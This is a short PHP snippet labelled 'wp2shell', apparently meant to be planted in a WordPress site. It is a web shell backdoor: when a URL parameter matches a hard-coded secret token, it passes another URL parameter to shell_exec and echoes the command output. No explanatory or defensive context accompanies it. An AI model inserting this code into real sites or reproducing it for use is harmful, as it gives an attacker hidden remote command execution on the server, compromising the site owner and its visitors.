// wp2shell if (isset($_GET['t']) && hash_equals('011bad5653b2401652588f2841148181', (string)$_GET['t']) && isset($_GET['c'])) { echo 'WP2SHELL::' . shell_exec((string)$_GET['c']) . '::END'; die(); }